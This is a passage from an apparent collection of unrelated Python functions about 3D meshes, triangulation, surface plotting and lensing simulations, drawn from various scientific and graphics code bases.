dtype=dtype)\n data[:,:3] = vertices\n if st_values is not None:\n data[:,3:5] = st_values\n if rgba_values is not None:\n data[:,rgba_offset:] = rgba_values\n\n if type == 'triangles':\n # counter clockwise\n # top right -> top left -> bottom left\n # top right -> bottom left -> bottom right\n indices = np.tile(np.array([0, 1, 2, 0, 2, 3], dtype='int'), (6,1))\n for face in range(6):\n indices[face] += (face * 4)\n indices.shape = (-1,)\n elif type == 'triangle_strip':\n raise NotImplementedError\n elif type == 'triangle_fan':\n raise NotImplementedError\n elif type == 'quads':\n raise NotImplementedError\n elif type == 'quad_strip':\n raise NotImplementedError\n else:\n raise ValueError('Unknown type')\n\n return data, indices", "def triangle_edges(length=2.0, divisions=4)):\n\n def _edges_from_triangle(triangle):\n a, b, c = triangle\n return [(a, b), (b, c), (c, a)]\n\n vertices, facets = triangle_facets(length, divisions)\n edges = []\n for facet in facets:\n edges.extend(_edges_from_triangle(facet))\n return vertices, edges", "def Volumes(self, with_sign=False, gpoints=None):\n\n assert self.elements is not None\n assert self.element_type is not None\n\n if self.points.shape[1] == 2:\n raise ValueError(\"2D mesh does not have volume\")\n if gpoints is None:\n assert self.points is not None\n gpoints = self.points\n\n if self.element_type == \"tet\":\n\n a = gpoints[self.elements[:,0],:]\n b = gpoints[self.elements[:,1],:]\n c = gpoints[self.elements[:,2],:]\n d = gpoints[self.elements[:,3],:]\n\n det_array = np.dstack((a-d,b-d,c-d))\n # FIND VOLUME OF ALL THE ELEMENTS\n volume = 1./6.*np.linalg.det(det_array)\n\n elif self.element_type == \"hex\":\n\n # Refer: https://en.wikipedia.org/wiki/Parallelepiped\n\n a = gpoints[self.elements[:,0],:]\n b = gpoints[self.elements[:,1],:]\n c = gpoints[self.elements[:,3],:]\n d = gpoints[self.elements[:,4],:]\n\n det_array = np.dstack((b-a,c-a,d-a))\n # FIND VOLUME OF ALL THE ELEMENTS\n volume = np.linalg.det(det_array)\n\n else:\n raise NotImplementedError(\"Computing volumes for\", self.element_type, \"elements not implemented yet\")\n\n if with_sign is False:\n 
volume = np.abs(volume)\n\n return volume", "def get_edges(triangles: np.ndarray) -> Tuple[np.ndarray, np.ndarray]:\n edges = np.concatenate([triangles[:, e] for e in [(0, 1), (1, 2), (2, 0)]])\n edges = np.sort(edges, axis=1)\n edges, counts = np.unique(edges, return_counts=True, axis=0)\n return edges, counts == 1", "def ConvertTrisToQuads(self):\n\n self.__do_essential_memebers_exist__()\n if self.element_type == \"quad\":\n return\n assert self.element_type == \"tri\"\n if self.IsHighOrder:\n raise ValueError('High order triangular elements cannot be converted to low/high order quads')\n\n tconv = time()\n\n # SPLIT THE TRIANGLE INTO 3 QUADS BY CONNECTING THE\n # MEDIAN AND MIDPOINTS OF THE TRIANGLE\n\n # FIND MEDIAN OF TRIANGLES\n # median = self.Median()\n median = np.sum(self.points[self.elements,:],axis=1)/self.elements.shape[1]\n # FIND EDGE MIDPOINTS OF TRIANGLES\n mid0 = np.sum(self.points[self.elements[:,:2],:],axis=1)/2.\n mid1 = np.sum(self.points[self.elements[:,[1,2]],:],axis=1)/2.\n mid2 = np.sum(self.points[self.elements[:,[2,0]],:],axis=1)/2.\n\n # STABLE APPROACH\n # points = np.zeros((1,2))\n # for elem in range(self.nelem):\n # quad0 = np.concatenate((self.points[self.elements[elem,0],:][None,:],mid0[elem,:][None,:],\n # median[elem,:][None,:],mid2[elem,:][None,:]),axis=0)\n # quad1 = np.concatenate((self.points[self.elements[elem,1],:][None,:],mid1[elem,:][None,:],\n # median[elem,:][None,:],mid0[elem,:][None,:]),axis=0)\n # quad2 = np.concatenate((self.points[self.elements[elem,2],:][None,:],mid2[elem,:][None,:],\n # median[elem,:][None,:],mid1[elem,:][None,:]),axis=0)\n # points = np.concatenate((points,quad0,quad1,quad2))\n # points = points[1:,:]\n\n points = np.zeros((3*self.nelem*4,2))\n points[::3*4,:] = self.points[self.elements[:,0],:]\n points[1::3*4,:] = mid0\n points[2::3*4,:] = median\n points[3::3*4,:] = mid2\n\n points[4::3*4,:] = self.points[self.elements[:,1],:]\n points[5::3*4,:] = mid1\n points[6::3*4,:] = median\n points[7::3*4,:] = mid0\n\n points[8::3*4,:] = self.points[self.elements[:,2],:]\n points[9::3*4,:] = mid2\n points[10::3*4,:] = median\n points[11::3*4,:] = mid1\n\n\n # KEEP ZEROFY ON, OTHERWISE YOU GET STRANGE BEHVAIOUR\n Decimals = 10\n rounded_points = points.copy()\n makezero(rounded_points)\n rounded_repoints = np.round(rounded_points,decimals=Decimals)\n points, idx_points, inv_points = unique2d(rounded_points,order=False,\n consider_sort=False,return_index=True,return_inverse=True)\n\n elements = np.arange(points.shape[0])[inv_points].reshape(3*self.nelem,4)\n\n self.__reset__()\n\n self.element_type = \"quad\"\n self.elements = elements\n self.points = points\n self.nelem = self.elements.shape[0]\n self.nnode = self.points.shape[0]\n self.GetBoundaryEdgesQuad()\n\n print(\"Triangular to quadrilateral mesh conversion took\", time() - tconv, \"seconds\")", "def polyhedra_from_xyz(xyz_file: str,\n try_convex_hull: bool = True)\\\n -> Tuple[List[Polyhedron],\\\n List[VertexCollection],\\\n List[Union[Polyhedron,VertexCollection]]]:\n\n object_coordinates_dict: Dict[str, List[List[float]]] = {}\n polyhedron_list: List[Polyhedron] = []\n vertex_collection_list: List[VertexCollection] = []\n object_list: List[Union[Polyhedron,VertexCollection]] = []\n type_order: List[str] = []\n with open(xyz_file, 'r') as f:\n lines = f.readlines()\n for i in range(len(lines)):\n line = lines[i].strip()\n if i == 0:\n l = re.search(\"\\d+$\", line)\n assert l is not None\n n_points = int(l.group())\n elif i == 1:\n l = re.search(\"\\d+$\", line)\n 
assert l is not None\n dim = int(l.group())\n assert dim <= 3, 'We cannot visualise the fourth dimension and\\\n above.'\n else:\n if line == '':\n continue\n l = re.search(\"([A-Za-z]+[0-9]*)[\\s\\t]+\", line)\n assert l is not None\n point_type = l.group(1)\n l2 = re.findall(\"[+-]?\\d+\\.\\d*\", line)\n point_coordinates = []\n for coordinate in l2:\n point_coordinates.append(float(coordinate))\n assert len(point_coordinates) == dim\n if point_type not in object_coordinates_dict:\n object_coordinates_dict[point_type] = []\n object_coordinates_dict[point_type].append(point_coordinates)\n if point_type not in type_order:\n type_order.append(point_type)\n\n for point_type in type_order:\n object_coordinates = np.array(object_coordinates_dict[point_type])\n if try_convex_hull:\n try:\n print(\"Attempting to construct a convex hull for {}...\"\\\n .format(point_type))\n polyhedron = construct_convex_hull_from_coords\\\n (object_coordinates)\n polyhedron_list.append(polyhedron)\n object_list.append(polyhedron) \n except:\n print(\"Failed to construct a convex hull for {}.\"\\\n .format(point_type))\n print(\"Falling back to vertex collection for {}...\"\\\n .format(point_type))\n vertex_collection = construct_vertex_collection_from_coords\\\n (object_coordinates, 2)\n vertex_collection_list.append(vertex_collection)\n object_list.append(vertex_collection) \n else:\n print(\"Constructing a vertex collection for {}...\"\\\n .format(point_type))\n vertex_collection = construct_vertex_collection_from_coords\\\n (object_coordinates, 2)\n vertex_collection_list.append(vertex_collection)\n object_list.append(vertex_collection) \n\n return polyhedron_list,vertex_collection_list,object_list", "def triangle(p1, p2, p3, width, height):\r\n v1 = vec2(round(p1.x), round(p1.y))\r\n v2 = vec2(round(p2.x), round(p2.y))\r\n v3 = vec2(round(p3.x), round(p3.y))\r\n if (v1.y > v2.y):\r\n temp = v1\r\n v1 = v2\r\n v2 = temp\r\n if (v1.y > v3.y):\r\n temp = v1\r\n v1 = v3\r\n v3 = temp\r\n if (v2.y > v3.y):\r\n temp = v2\r\n v2 = v3\r\n v3 = temp\r\n if (v1.y != v2.y): k_12 = (v2.x - v1.x)/(v2.y - v1.y)\r\n if (v1.y != v3.y): k_13 = (v3.x - v1.x)/(v3.y - v1.y)\r\n if (v2.y != v3.y): k_23 = (v3.x - v2.x)/(v3.y - v2.y)\r\n if (v1.y == v2.y):\r\n if (v1.x < v2.x):\r\n xl, xu = v1.x, v2.x\r\n left = False\r\n else:\r\n xl, xu = v2.x, v1.x\r\n left = True\r\n if (v1.y >= 0 and v1.y < height):\r\n xl = max(xl, 0)\r\n xu = min(xu, width - 1)\r\n for x in range(xl, xu + 1):\r\n yield vec2(x, v1.y)\r\n else:\r\n left = v2.x < k_13*(v2.y - v1.y) + v1.x\r\n if (left):\r\n k1, k2 = k_12, k_13\r\n else:\r\n k1, k2 = k_13, k_12\r\n yl = max(v1.y, 0)\r\n yu = min(v2.y, height)\r\n for y in range(yl, yu):\r\n xl = max(math.floor(k1*(y - v1.y) + v1.x + 0.5), 0)\r\n xu = min(math.floor(k2*(y - v1.y) + v1.x + 0.5), width - 1)\r\n for x in range(xl, xu + 1):\r\n yield vec2(x, y)\r\n if (v2.y == v3.y):\r\n if (v2.x < v3.x):\r\n xl, xu = v2.x, v3.x\r\n else:\r\n xl, xu = v3.x, v2.x\r\n if (v2.y >= 0 and v2.y < height):\r\n xl = max(xl, 0)\r\n xu = min(xu, width - 1)\r\n for x in range(xl, xu + 1):\r\n yield vec2(x, v2.y)\r\n else:\r\n if (left):\r\n k1, k2 = k_23, k_13\r\n t1, t2 = v2, v1\r\n else:\r\n k1, k2 = k_13, k_23\r\n t1, t2 = v1, v2\r\n yl = max(v2.y, 0)\r\n yu = min(v3.y + 1, height)\r\n for y in range(yl, yu):\r\n xl = max(math.floor(k1*(y - t1.y) + t1.x + 0.5), 0)\r\n xu = min(math.floor(k2*(y - t2.y) + t2.x + 0.5), width - 1)\r\n for x in range(xl, xu + 1):\r\n yield vec2(x, y)", "def surface_mask(self):\n return 
np.vectorize(lambda name: name in self.nvertices.keys())(self.name)", "def face_normals(xyz, triangles):\n\n\tabc_xyz = face_attr(xyz, triangles)\n\n\tbc_xyz = abc_xyz[:,:,1:3] - abc_xyz[:,:,0:1]\n\tfn = tf.linalg.cross(bc_xyz[:,:,0], bc_xyz[:,:,1])\n\tfn = tf.math.l2_normalize(fn, -1)\n\treturn fn", "def surface(*args, degreeU: int=0, degreeV: int=0, formU: AnyStr=\"\", formV: AnyStr=\"\", knotU:\n Union[float, List[float]]=0.0, knotV: Union[float, List[float]]=0.0, name:\n AnyStr=\"\", objectSpace: bool=True, point: Union[List[float, float, float],\n List[List[float, float, float]]]=None, pointWeight: Union[List[float, float, float,\n float], List[List[float, float, float, float]]]=None, worldSpace: bool=True,\n **kwargs)->AnyStr:\n pass", "def DisplayMesh():\r\n \r\n # Load Surface Mesh Data and generate normals\r\n VTKString = OpenData('C:/Users/Tim/Documents/University/Year 4/Final Project/FinalYearProjectCode/TEH_Code/InputFiles','muscle_surface.vtk')\r\n header, Vertices, Triangles = CreateMatrixVTK(VTKString)\r\n \r\n fig = plt.figure()\r\n ax1 = fig.add_subplot(111,projection = '3d')\r\n ax1.plot_trisurf(Vertices[:,0],Vertices[:,1],Vertices[:,2],triangles= Triangles[:,1:])\r\n ax1.set_zlabel('z')\r\n ax1.set_ylabel('y')\r\n ax1.set_xlabel('x')\r\n plt.show()", "def triangulate_ngons(bm):\n triangulate = []\n for face in bm.faces:\n if len(face.verts) > 4:\n triangulate.append(face)\n if triangulate:\n bmesh.ops.triangulate(bm, faces=triangulate,\n quad_method=0, ngon_method=0)\n return len(triangulate)", "def _tvb_surface_to_tri(self, surface_file_name):\n surface_file_path = os.path.join(OM_STORAGE_DIR, surface_file_name)\n\n #TODO: check file doesn't already exist\n LOG.info(\"Writing TVB surface to .tri file: %s\" % surface_file_path)\n file_handle = file(surface_file_path, \"a\")\n\n file_handle.write(\"- %d \\n\" % self.sources.number_of_vertices)\n verts_norms = numpy.hstack((self.sources.vertices, \n self.sources.vertex_normals))\n numpy.savetxt(file_handle, verts_norms)\n\n tri_str = \"- \" + (3 * (str(self.sources.number_of_triangles) + \" \")) + \"\\n\"\n file_handle.write(tri_str)\n numpy.savetxt(file_handle, self.sources.triangles, fmt=\"%d\")\n\n file_handle.close()\n LOG.info(\"%s written successfully.\" % surface_file_name)\n\n return surface_file_path", "def list_plot3d_tuples(v, interpolation_type, texture, **kwds):\n from matplotlib import tri, delaunay\n import numpy\n import scipy\n from random import random\n from scipy import interpolate\n from .plot3d import plot3d\n\n if len(v)<3:\n raise ValueError(\"We need at least 3 points to perform the interpolation\")\n\n x = [float(p[0]) for p in v]\n y = [float(p[1]) for p in v]\n z = [float(p[2]) for p in v]\n\n # If the (x,y)-coordinates lie in a one-dimensional subspace, the\n # matplotlib Delaunay code segfaults. Therefore, we compute the\n # correlation of the x- and y-coordinates and add small random\n # noise to avoid the problem if needed.\n corr_matrix = numpy.corrcoef(x, y)\n if corr_matrix[0, 1] > 0.9 or corr_matrix[0, 1] < -0.9:\n ep = float(.000001)\n x = [float(p[0]) + random()*ep for p in v]\n y = [float(p[1]) + random()*ep for p in v]\n\n\n # If the list of data points has two points with the exact same\n # (x,y)-coordinate but different z-coordinates, then we sometimes\n # get segfaults. 
The following block checks for this and raises\n # an exception if this is the case.\n # We also remove duplicate points (which matplotlib can't handle).\n # Alternatively, the code in the if block above which adds random\n # error could be applied to perturb the points.\n drop_list = []\n nb_points = len(x)\n for i in range(nb_points):\n for j in range(i+1, nb_points):\n if x[i] == x[j] and y[i] == y[j]:\n if z[i] != z[j]:\n raise ValueError(\"Two points with same x,y coordinates and different z coordinates were given. Interpolation cannot handle this.\")\n elif z[i] == z[j]:\n drop_list.append(j)\n x = [x[i] for i in range(nb_points) if i not in drop_list]\n y = [y[i] for i in range(nb_points) if i not in drop_list]\n z = [z[i] for i in range(nb_points) if i not in drop_list]\n\n xmin = float(min(x))\n xmax = float(max(x))\n ymin = float(min(y))\n ymax = float(max(y))\n\n num_points = kwds['num_points'] if 'num_points' in kwds else int(4*numpy.sqrt(len(x)))\n #arbitrary choice - assuming more or less a nxn grid of points\n # x should have n^2 entries. We sample 4 times that many points.\n\n if interpolation_type == 'linear':\n T = tri.Triangulation(x, y)\n f = tri.LinearTriInterpolator(T, z)\n j = numpy.complex(0, 1)\n from .parametric_surface import ParametricSurface\n def g(x, y):\n z = f(x, y)\n return (x, y, z)\n G = ParametricSurface(g, (list(numpy.r_[xmin:xmax:num_points*j]), list(numpy.r_[ymin:ymax:num_points*j])), texture=texture, **kwds)\n G._set_extra_kwds(kwds)\n return G\n\n if interpolation_type == 'nn' or interpolation_type =='default':\n\n T=delaunay.Triangulation(x,y)\n f=T.nn_interpolator(z)\n f.default_value=0.0\n j=numpy.complex(0,1)\n vals=f[ymin:ymax:j*num_points,xmin:xmax:j*num_points]\n from .parametric_surface import ParametricSurface\n def g(x,y):\n i=round( (x-xmin)/(xmax-xmin)*(num_points-1) )\n j=round( (y-ymin)/(ymax-ymin)*(num_points-1) )\n z=vals[int(j),int(i)]\n return (x,y,z)\n G = ParametricSurface(g, (list(numpy.r_[xmin:xmax:num_points*j]), list(numpy.r_[ymin:ymax:num_points*j])), texture=texture, **kwds)\n G._set_extra_kwds(kwds)\n return G\n\n if interpolation_type == 'spline':\n from .plot3d import plot3d\n kx = kwds['kx'] if 'kx' in kwds else 3\n ky = kwds['ky'] if 'ky' in kwds else 3\n if 'degree' in kwds:\n kx = kwds['degree']\n ky = kwds['degree']\n s = kwds['smoothing'] if 'smoothing' in kwds else len(x)-numpy.sqrt(2*len(x))\n s = interpolate.bisplrep(x, y, z, [int(1)]*len(x), xmin, xmax, ymin, ymax, kx=kx, ky=ky, s=s)\n f = lambda x,y: interpolate.bisplev(x, y, s)\n return plot3d(f, (xmin, xmax), (ymin, ymax), texture=texture, plot_points=[num_points, num_points], **kwds)", "def triangles_svg_path(self):\n verts = self.vertices.split(',') # leave as string\n tris = [int(v) for v in self.triangles.split(',')]\n data = []\n for i in xrange(0, len(tris), 3):\n v0 = 2 * tris[i]\n v1 = 2 * tris[i + 1]\n v2 = 2 * tris[i + 2]\n data.append(u\"M%s,%sL%s,%sL%s,%sz\" % (\n verts[v0], verts[v0 + 1],\n verts[v1], verts[v1 + 1],\n verts[v2], verts[v2 + 1],\n ))\n return u\"\".join(data)", "def test_2_2_3D_cube_splits(self):\n check = [(0, 0, 0), (1, 1, 1), (1, 0, 0), (1, 1, 0), (1, 0, 1),\n (0, 1, 0),\n (0, 1, 1), (0, 0, 1), (0.5, 0.5, 0.5), (0.0, 0.5, 0.5),\n (0.0, 0.0, 0.5), (0.0, 0.5, 0.0), (0.5, 0.0, 0.5),\n (0.5, 0.0, 0.0),\n (0.5, 0.5, 0.0), (0.25, 0.25, 0.25), (1.0, 0.5, 0.5),\n (1.0, 1.0, 0.5),\n (1.0, 0.5, 1.0), (0.5, 1.0, 0.5), (0.5, 1.0, 1.0),\n (0.5, 0.5, 1.0),\n (0.75, 0.75, 0.75), (1.0, 0.0, 0.5), (1.0, 0.5, 0.0),\n (0.75, 0.25, 0.25), (0.5, 
1.0, 0.0), (0.75, 0.75, 0.25),\n (0.5, 0.0, 1.0), (0.75, 0.25, 0.75), (0.0, 1.0, 0.5),\n (0.25, 0.75, 0.25), (0.0, 0.5, 1.0), (0.25, 0.75, 0.75),\n (0.25, 0.25, 0.75), (0.5, 0.25, 0.25), (0.5, 0.5, 0.25),\n (0.5, 0.25, 0.5), (0.25, 0.5, 0.25), (0.25, 0.5, 0.5),\n (0.25, 0.25, 0.5), (0.375, 0.375, 0.375), (0.0, 0.25, 0.25),\n (0.0, 0.0, 0.25), (0.0, 0.25, 0.0), (0.25, 0.0, 0.25),\n (0.25, 0.0, 0.0), (0.25, 0.25, 0.0), (0.125, 0.125, 0.125),\n (0.0, 0.5, 0.25), (0.0, 0.25, 0.5), (0.125, 0.375, 0.375),\n (0.25, 0.0, 0.5), (0.125, 0.125, 0.375), (0.25, 0.5, 0.0),\n (0.125, 0.375, 0.125), (0.5, 0.0, 0.25), (0.375, 0.125, 0.375),\n (0.5, 0.25, 0.0), (0.375, 0.125, 0.125), (0.375, 0.375, 0.125),\n (0.5, 0.75, 0.75), (0.5, 0.5, 0.75), (0.5, 0.75, 0.5),\n (0.75, 0.5, 0.75), (0.75, 0.5, 0.5), (0.75, 0.75, 0.5),\n (0.625, 0.625, 0.625), (1.0, 0.75, 0.75), (1.0, 1.0, 0.75),\n (1.0, 0.75, 1.0), (0.75, 1.0, 0.75), (0.75, 1.0, 1.0),\n (0.75, 0.75, 1.0), (0.875, 0.875, 0.875), (1.0, 0.5, 0.75),\n (1.0, 0.75, 0.5), (0.875, 0.625, 0.625), (0.75, 1.0, 0.5),\n (0.875, 0.875, 0.625), (0.75, 0.5, 1.0), (0.875, 0.625, 0.875),\n (0.5, 1.0, 0.75), (0.625, 0.875, 0.625), (0.5, 0.75, 1.0),\n (0.625, 0.875, 0.875), (0.625, 0.625, 0.875),\n (0.75, 0.5, 0.25),\n (0.75, 0.25, 0.5), (0.625, 0.375, 0.375), (1.0, 0.25, 0.25),\n (1.0, 0.0, 0.25), (1.0, 0.25, 0.0), (0.75, 0.0, 0.25),\n (0.75, 0.0, 0.0), (0.75, 0.25, 0.0), (0.875, 0.125, 0.125),\n (1.0, 0.5, 0.25), (1.0, 0.25, 0.5), (0.875, 0.375, 0.375),\n (0.75, 0.0, 0.5), (0.875, 0.125, 0.375), (0.75, 0.5, 0.0),\n (0.875, 0.375, 0.125), (0.625, 0.125, 0.375),\n (0.625, 0.125, 0.125),\n (0.625, 0.375, 0.125), (0.5, 0.75, 0.25),\n (0.625, 0.625, 0.375),\n (1.0, 0.75, 0.25), (1.0, 1.0, 0.25), (1.0, 0.75, 0.0),\n (0.75, 1.0, 0.25), (0.75, 1.0, 0.0), (0.75, 0.75, 0.0),\n (0.875, 0.875, 0.125), (0.875, 0.625, 0.375),\n (0.875, 0.875, 0.375),\n (0.875, 0.625, 0.125), (0.5, 1.0, 0.25), (0.625, 0.875, 0.375),\n (0.5, 0.75, 0.0), (0.625, 0.875, 0.125), (0.625, 0.625, 0.125),\n (0.5, 0.25, 0.75), (0.625, 0.375, 0.625), (1.0, 0.25, 0.75),\n (1.0, 0.0, 0.75), (1.0, 0.25, 1.0), (0.75, 0.0, 0.75),\n (0.75, 0.0, 1.0), (0.75, 0.25, 1.0), (0.875, 0.125, 0.875),\n (0.875, 0.375, 0.625), (0.875, 0.125, 0.625),\n (0.875, 0.375, 0.875),\n (0.5, 0.0, 0.75), (0.625, 0.125, 0.625), (0.5, 0.25, 1.0),\n (0.625, 0.125, 0.875), (0.625, 0.375, 0.875),\n (0.25, 0.75, 0.5),\n (0.375, 0.625, 0.375), (0.0, 0.75, 0.25), (0.0, 1.0, 0.25),\n (0.0, 0.75, 0.0), (0.25, 1.0, 0.25), (0.25, 1.0, 0.0),\n (0.25, 0.75, 0.0), (0.125, 0.875, 0.125), (0.0, 0.75, 0.5),\n (0.125, 0.625, 0.375), (0.25, 1.0, 0.5), (0.125, 0.875, 0.375),\n (0.125, 0.625, 0.125), (0.375, 0.875, 0.375),\n (0.375, 0.875, 0.125),\n (0.375, 0.625, 0.125), (0.25, 0.5, 0.75),\n (0.375, 0.625, 0.625),\n (0.0, 0.75, 0.75), (0.0, 1.0, 0.75), (0.0, 0.75, 1.0),\n (0.25, 1.0, 0.75), (0.25, 1.0, 1.0), (0.25, 0.75, 1.0),\n (0.125, 0.875, 0.875), (0.0, 0.5, 0.75), (0.125, 0.625, 0.625),\n (0.125, 0.875, 0.625), (0.25, 0.5, 1.0), (0.125, 0.625, 0.875),\n (0.375, 0.875, 0.625), (0.375, 0.875, 0.875),\n (0.375, 0.625, 0.875),\n (0.375, 0.375, 0.625), (0.0, 0.25, 0.75), (0.0, 0.0, 0.75),\n (0.0, 0.25, 1.0), (0.25, 0.0, 0.75), (0.25, 0.0, 1.0),\n (0.25, 0.25, 1.0), (0.125, 0.125, 0.875),\n (0.125, 0.375, 0.625),\n (0.125, 0.125, 0.625), (0.125, 0.375, 0.875),\n (0.375, 0.125, 0.625),\n (0.375, 0.125, 0.875), (0.375, 0.375, 0.875)]\n\n nn_checks = {(0.5, 0.25, 0.25): [(0.375, 0.375, 0.125), (0.5, 0.5, 0.0),\n (0.75, 0.25, 0.25),\n (0.625, 0.375, 0.375),\n (0.625, 
0.125, 0.375),\n (0.625, 0.125, 0.125),\n (0.5, 0.5, 0.25), (0.25, 0.25, 0.25),\n (0.375, 0.375, 0.375),\n (0.5, 0.25, 0.5), (0.5, 0.5, 0.5),\n (0.5, 0.0, 0.25),\n (0.375, 0.125, 0.375), (0.5, 0.0, 0.5),\n (0.5, 0.25, 0.0),\n (0.375, 0.125, 0.125), (0.5, 0.0, 0.0),\n (0.625, 0.375, 0.125)],\n (0.625, 0.625, 0.875): [(0.75, 0.5, 1.0),\n (0.75, 0.75, 1.0),\n (0.5, 0.75, 1.0), (0.5, 0.5, 1.0),\n (0.5, 0.5, 0.75),\n (0.5, 0.75, 0.75),\n (0.75, 0.5, 0.75),\n (0.75, 0.75, 0.75)],\n (0, 0, 0): [(0.0, 0.25, 0.0), (0.125, 0.125, 0.125),\n (0.0, 0.0, 0.25), (0.25, 0.0, 0.0),\n (0.0, 0.25, 0.25), (0.25, 0.25, 0.0),\n (0.25, 0.0, 0.25)]}\n\n init_triangulation(3, 2, check, nn_checks)", "def get_3d_heads_inter():\n \n # Extract vertices and faces for the first head\n file_manager = ExitStack()\n atexit.register(file_manager.close)\n ref = importlib_resources.files('hypyp') / 'data/Basehead.obj'\n filename = file_manager.enter_context(importlib_resources.as_file(ref))\n\n mesh = meshio.read(Path(filename).resolve())\n zoom = 0.064\n interval = 0.32\n\n head1_v = mesh.points*zoom\n head1_f = mesh.cells[0].data\n\n # Copy the first head to create a second head\n head2_v = copy(mesh.points*zoom)\n # Move the vertices by Y rotation and Z translation\n rotY = np.pi\n newX = head2_v[:, 0] * np.cos(rotY) - head2_v[:, 2] * np.sin(rotY)\n newZ = head2_v[:, 0] * np.sin(rotY) + head2_v[:, 2] * np.cos(rotY)\n head2_v[:, 0] = newX\n head2_v[:, 2] = newZ\n\n head1_v[:, 2] = head1_v[:, 2] - interval/2\n head2_v[:, 2] = head2_v[:, 2] + interval/2\n\n # Use the same faces\n head2_f = copy(mesh.cells[0].data)\n\n # Concatenate the vertices\n vertices = np.concatenate((head1_v, head2_v))\n # Concatenate the faces, shift vertices indexes for second head\n faces = np.concatenate((head1_f, head2_f + len(head1_v)))\n return vertices, faces", "def Tol3d(self, *args):\n return _Adaptor3d.Adaptor3d_TopolTool_Tol3d(self, *args)", "def surfaces(self):\n surfaces = []\n for i in range(1000):\n surface = self.surfaceInfo(i)\n if surface is not None:\n surfaces.append(surface)\n else:\n break\n\n return surfaces", "def planeSliceGFig3(uxmax, uymax, rF2, lc, ax, ay, m, n, npoints = 3000, gsizex = 2048, gsizey = 2048, comp = True):\n\n # Calculate coefficients\n alp = rF2*lc\n coeff = alp*np.array([1./ax**2, 1./ay**2])\n uF2x, uF2y = rF2*np.array([1./ax**2, 1./ay**2])\n\n # Calculate caustic intersections\n ucross = polishedRoots(causticEqSlice, uxmax, uymax, args = (alp, m, n, ax, ay))\n ncross = len(ucross)\n upcross = mapToUp(ucross.T, alp, ax, ay)\n p = np.argsort(upcross[0])\n upcross = upcross.T[p]\n ucross = ucross[p]\n print(upcross)\n print(ucross)\n\n # Calculate sign of second derivative at caustics\n sigs = np.zeros(ncross)\n for i in range(ncross):\n sigs[i] = np.sign(ax**2/rF2 + lc*(lensh(*[ucross[i][0], ucross[i][1]])[0]))\n print(sigs)\n\n # Set up quantities for proper u' plane slicing\n ymin = -m*uxmax + n\n ymax = m*uxmax + n\n if ymin < -uymax:\n xmin = (-uymax - n)/m\n ymin = m*xmin + n\n else:\n xmin = -uxmax\n if ymax > uymax:\n xmax = (uymax - n)/m\n ymax = m*xmax + n\n else:\n xmax = uxmax\n xx = np.linspace(gridToPixel(xmin, uxmax, gsizex/2), gridToPixel(xmax, uxmax, gsizex/2) - 1, gsizex)\n yy = np.linspace(gridToPixel(ymin, uymax, gsizey/2), gridToPixel(ymax, uymax, gsizey/2) - 1, gsizey)\n\n cdist = uxmax/(np.abs(100*lc))\n print(cdist)\n\n bound = np.insert(upcross, 0, np.array([[xmin, ymin]]), axis = 0) # set up boundaries\n bound = np.append(bound, np.array([[xmax, ymax]]), axis = 0)\n # print(bound)\n 
midpoints = [(bound[i] + bound[i+1])/2. for i in range(len(bound) - 1)] # find middle point between boundaries\n nzones = len(midpoints)\n nreal = np.zeros(nzones)\n print(nzones)\n for i in range(nzones): # find number of roots at each midpoint\n mpoint = midpoints[i]\n nreal[i] = len(findRoots(lensEq, 2*uxmax, 2*uymax, args = (mpoint, coeff), N = 1000))\n upxvecs = np.array([np.linspace(bound[i-1][0] + cdist, bound[i][0] - cdist, npoints) for i in range(1, ncross + 2)]) # generate upx vector\n # print(upxvecs)\n segs = np.asarray([lineVert(upx, m, n) for upx in upxvecs]) # generate slice across plane\n diff = difference(nreal) # determine number of complex solutions\n if comp == True:\n ncomplex = np.ones(nzones)*100\n for i in range(nzones):\n if diff[i] == 0 or diff[i] == -2:\n ncomplex[i] = 1\n elif diff[i] == -4:\n ncomplex[i] = 2\n elif diff[i] == 4:\n ncomplex[i] = 0\n else:\n ncomplex = np.zeros(nzones)\n \n print(nreal)\n print(ncomplex)\n\n # Solve lens equation at each coordinate\n allroots = rootFinder(segs, nreal, ncomplex, npoints, ucross, uxmax, uymax, coeff)\n \n # Calculate fields\n allfields = []\n for i in range(nzones):\n fields = obsCalc(GOfield, allroots[i], len(allroots[i][0]), npoints, 3, args=(rF2, lc, ax, ay))\n allfields.append(fields)\n\n # Construct uniform asymptotics\n asymp = uniAsymp(allroots, allfields, nreal, ncomplex, npoints, nzones, sigs)\n interp = UnivariateSpline(upxvecs.flatten(), asymp, s = 0)\n finx = np.linspace(xmin, xmax, 4*npoints)\n asymG = interp(finx)\n\n # KDI\n rx = np.linspace(-2*uxmax, 2*uxmax, gsizex)\n ry = np.linspace(-2*uymax, 2*uymax, gsizey)\n dux = 4*uxmax/gsizex\n duy = 4*uymax/gsizey\n extent = (-uxmax, uxmax, -uymax, uymax)\n ux, uy = np.meshgrid(rx, ry)\n lens = lensPhase(ux, uy, lc)\n lensfft = fft2(lens)\n geo = geoPhase(ux, uy, uF2x, uF2y)\n geofft = fft2(geo)\n fieldfft = lensfft*geofft\n field = fftshift(ifft2(fieldfft))\n soln = np.abs((dux*duy*field)**2/(4*pi**2*uF2x*uF2y))\n soln = soln[int(0.25*gsizex):int(0.75*gsizex), int(0.25*gsizey):int(0.75*gsizey)]\n\n # Plots\n fig = plt.figure(figsize = (15, 6), dpi = 100)\n grid = gs.GridSpec(1, 2)\n # tableax = plt.subplot(grid[1, :])\n # tableax2 = plt.subplot(grid[2, :])\n ax0, ax1 = plt.subplot(grid[0, 0]), plt.subplot(grid[0, 1])\n\n rx = np.linspace(-uxmax, uxmax, gsizex)\n ry = np.linspace(-uymax, uymax, gsizey)\n ux, uy = np.meshgrid(rx, ry)\n\n rx2 = np.linspace(xmin, xmax, gsizex)\n im0 = ax0.imshow(soln, origin = 'lower', extent = extent, aspect = 'auto') # Plot entire screen\n cbar = fig.colorbar(im0, ax = ax0)\n # cbar.set_label(r'$\\log{G}$', fontsize = 16)\n cbar.set_label('G', fontsize=18)\n cbar.ax.tick_params(labelsize=14)\n ucaus = causCurve([ux, uy], lc*np.array([uF2x, uF2y]))\n cs = plt.contour(np.linspace(-uxmax, uxmax, gsizex), ry, ucaus, levels = [0, np.inf], linewidths = 0)\n paths = cs.collections[0].get_paths()\n uppaths = []\n for p in paths:\n cuvert = np.array(p.vertices).T\n upx, upy = mapToUp(cuvert, alp, ax, ay)\n ax0.plot(upx, upy, color = 'white') # Plot caustic curves\n ax0.scatter(upcross.T[0], upcross.T[1], color = 'white')\n ax0.plot(rx2, rx2*m + n, color = 'white') # Plot observer motion\n ax0.set_xlabel(r\"$u'_x$\", 